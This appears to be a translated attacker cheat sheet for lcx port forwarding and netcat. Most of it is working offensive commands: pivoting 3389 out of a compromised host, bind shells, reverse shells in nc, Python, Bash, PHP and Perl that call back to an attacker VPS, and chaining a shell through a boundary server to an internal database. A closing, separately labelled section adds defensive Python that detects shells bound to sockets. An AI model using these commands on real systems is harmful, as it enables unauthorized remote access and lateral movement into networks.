lcx usage:
The Linux version of lcx is portmap.
1. Internal network port forwarding
Local machine: lcx -listen 2222 3333
2222 is the forwarding port; 3333 is any unused port on the local machine
Compromised host: lcx -slave 119.75.217.56 2222 127.0.0.1 3389
119.75.217.56 is the local machine's IP, 2222 the forwarding port, 127.0.0.1 the compromised host's internal IP, and 3389 the remote desktop port
When connecting to 3389, use the format 127.0.0.1:3333
2. Local port mapping
If port 3389 is blocked by the firewall, it can be forwarded to another port, e.g. 53:
lcx -tran 53 <local ip> 3389
netcat usage:
- Basic usage
  - Command help
root@calm:~# nc -h
[v1.10-41.1+b1]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [-options] [hostname] [port]
options:
-c shell commands as `-e'; use /bin/sh to exec [dangerous!!]
-e filename program to exec after connect [dangerous!!]
-b allow broadcasts
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-k set keepalive option on socket
-l listen mode, for inbound connects
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-q secs quit after EOF on stdin and delay of secs
-s addr local source address
-T tos set Type Of Service
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-C Send CRLF as line-ending
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. 'ftp\-data').
- Banner grabbing
  nc -nv 192.168.2.246 22
- Connect to a remote host
  nc -nvv ip port
- Port scanning
  root@calm:~# nc -v 192.168.2.183 80
  WIN-7-webserver.lan [192.168.2.183] 80 (http) open
  Scan a specified port range:
  root@calm:~# nc -v -z 192.168.2.183 1-1000
- Port listening
  nc -l -p port
- File transfer
  Listen locally:
  On the other machine enter:
- Simple chat
  On the local VPS enter: nc -l -p 999
  On the target machine enter: nc -vn <vps ip> 999
Getting a shell
- Bind shell
  nc -lvp 4444 -e /bin/sh                          (Linux)
  nc -lvp 4444 -e c:\windows\system32\cmd.exe      (Windows)
  On the VPS run:
  nc 192.168.2.183 4444
- Reverse shell
  On the VPS run:
  nc -lvp 4444
  On the target host run:
  nc <vps ip> 4444 -e /bin/sh                      (Linux)
  nc <vps ip> 4444 -e c:\windows\system32\cmd.exe  (Windows)
- Getting a reverse shell when the target machine has no nc
  - Python reverse shell
    On the VPS run: nc -lvp 4444
    On the target host run:
    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.181",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  - Bash reverse shell
    On the VPS run: nc -lvp 4444
    On the target host run: bash -i >& /dev/tcp/192.168.2.181/4444 0>&1
  - PHP reverse shell
    On the VPS run:
    nc -lvp 4444
    On the target host run:
    php -r '$sock=fsockopen("192.168.2.181",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
  - Perl reverse shell
    On the VPS run:
    nc -lvp 4444
    On the target machine run:
    perl -e 'use Socket;$i="192.168.2.181";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
- Internal network proxy
  Listen on the VPS:
  nc -lvp 3333
  On the database server run:
  nc -lvp 3333 -e /bin/sh
  On the web server (the boundary server) run:
  nc -v 192.168.2.181 3333 -c "nc -v <database internal ip> 3333"
  This gives the VPS a shell on the internal database host.
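As an added defender-side example (not part of the original cheat sheet): every shell variant above, whether spawned by nc -e, by the dup2 calls in the Python one-liner, or by bash's >& /dev/tcp redirection, ends up as an interactive shell whose file descriptors 0, 1 and 2 all point at the same socket, and Linux exposes that footprint in /proc/<pid>/fd. The shell-name list and the sample snapshot below are assumptions constructed for the example.

```python
import os

# Assumed list of shell process names worth flagging (extend as needed).
SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}


def shells_bound_to_sockets(procs):
    """procs: {pid: {"comm": str, "fds": {fd_number: link_target}}}.
    Returns the pids of shell processes whose stdin, stdout and stderr
    all resolve to sockets, the footprint left by the reverse/bind shells above.
    A normal interactive shell has these on a pty (/dev/pts/N), not a socket."""
    hits = []
    for pid, info in procs.items():
        if info["comm"] not in SHELLS:
            continue
        fds = info["fds"]
        if all(fds.get(n, "").startswith("socket:[") for n in (0, 1, 2)):
            hits.append(pid)
    return sorted(hits)


def snapshot_proc(root="/proc"):
    """Build the same structure from a live Linux /proc (needs permission to
    read other users' fd links; processes that vanish or are unreadable are skipped)."""
    procs = {}
    for entry in os.listdir(root):
        if not entry.isdigit():
            continue
        pid = int(entry)
        try:
            with open(f"{root}/{pid}/comm") as f:
                comm = f.read().strip()
            fd_dir = f"{root}/{pid}/fd"
            fds = {int(n): os.readlink(f"{fd_dir}/{n}") for n in os.listdir(fd_dir)}
        except OSError:
            continue
        procs[pid] = {"comm": comm, "fds": fds}
    return procs


# Constructed sample snapshot, not taken from a real system.
SAMPLE = {
    101: {"comm": "bash", "fds": {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}},  # benign terminal
    202: {"comm": "sh", "fds": {0: "socket:[48120]", 1: "socket:[48120]", 2: "socket:[48120]"}},  # shell on a socket
    303: {"comm": "nginx", "fds": {0: "/dev/null", 1: "socket:[999]", 2: "socket:[999]"}},  # daemon, not a shell
}

if __name__ == "__main__":
    print(shells_bound_to_sockets(SAMPLE))  # [202]
    print(shells_bound_to_sockets(snapshot_proc()))  # live hosts (Linux only)
```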